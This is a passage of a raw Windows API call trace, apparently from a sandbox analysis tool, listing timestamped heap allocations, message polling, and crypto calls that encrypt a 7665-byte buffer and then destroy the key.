Flags=0x0, Size=0x10) returned 0x8891f0 [0043.247] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0043.247] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0043.247] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0043.247] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0043.247] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0043.247] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0043.247] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0043.247] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0043.247] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0043.248] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0043.248] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0043.248] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0043.248] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0043.248] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0043.248] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0043.248] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0043.248] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0043.248] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0043.248] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0043.248] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0043.248] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0043.248] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0043.248] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0043.248] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0043.248] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0043.248] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0043.248] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0043.248] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0043.248] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0043.248] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0043.248] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0043.248] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0043.248] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0043.248] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0043.248] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0043.248] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0043.248] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0043.248] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0043.248] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0043.248] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0043.248] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0043.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0043.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0043.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0043.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0043.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0043.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0043.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0043.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0043.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0043.249] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0043.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0043.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0043.249] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0043.249] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0043.249] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0043.249] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0043.249] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0043.249] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0043.249] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0043.249] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0043.249] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0043.249] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0043.249] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0043.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0043.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0043.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0043.249] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0043.249] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0043.251] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0043.251] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0043.251] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0043.251] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0043.251] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.251] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0043.251] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0043.251] CryptGetKeyParam (in: hKey=0x7c2280, dwParam=0x7, pbData=0x7da2c8, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da2c8*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0043.251] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0043.251] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0043.251] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.251] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.251] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.251] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.251] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0043.251] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.251] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.251] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0043.251] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0043.251] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0043.252] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.252] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0043.252] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.252] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0043.252] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0043.252] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.252] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0043.252] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.252] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0043.252] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.252] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0043.252] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0043.252] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0043.252] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0043.252] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0043.252] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.252] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.252] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.252] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.252] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0043.252] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.252] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.252] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.252] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0043.252] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0043.253] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.253] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x1dee, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x1df0) returned 1 [0043.253] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.253] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0043.253] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.253] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.253] CharLowerBuffW (in: lpsz="byte[7665]", cchLength=0xa | out: lpsz="byte[7665]") returned 0xa [0043.253] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.253] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.253] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0043.253] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0043.253] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.253] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xac7a00*, pdwDataLen=0x6ae220*=0x1dee, dwBufLen=0x1df0 | out: pbData=0xac7a00*, pdwDataLen=0x6ae220*=0x1df0) returned 1 [0043.253] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.253] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.253] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0043.254] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.254] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.254] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.254] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.254] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0043.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0043.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0043.254] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.254] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0043.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0043.254] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0043.254] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0043.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0043.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0043.254] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.254] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0043.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0043.254] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0043.254] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0043.254] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0043.254] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0043.254] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.255] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.255] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.255] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0043.255] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.255] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.256] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.256] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0043.256] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.256] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0043.256] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0043.256] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.256] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.256] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0043.256] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0043.256] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.256] CryptDestroyKey (hKey=0x7c2280) returned 1 [0043.256] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0043.256] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0043.256] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0043.256] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0043.256] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0043.256] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0043.256] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0043.256] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.256] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0043.256] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0043.256] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0043.256] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0043.256] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0043.256] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0043.257] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0043.257] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.257] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0043.257] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0043.257] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0043.257] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0043.257] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0043.257] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0043.257] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0043.257] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0043.257] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0043.257] PeekMessageW (in: 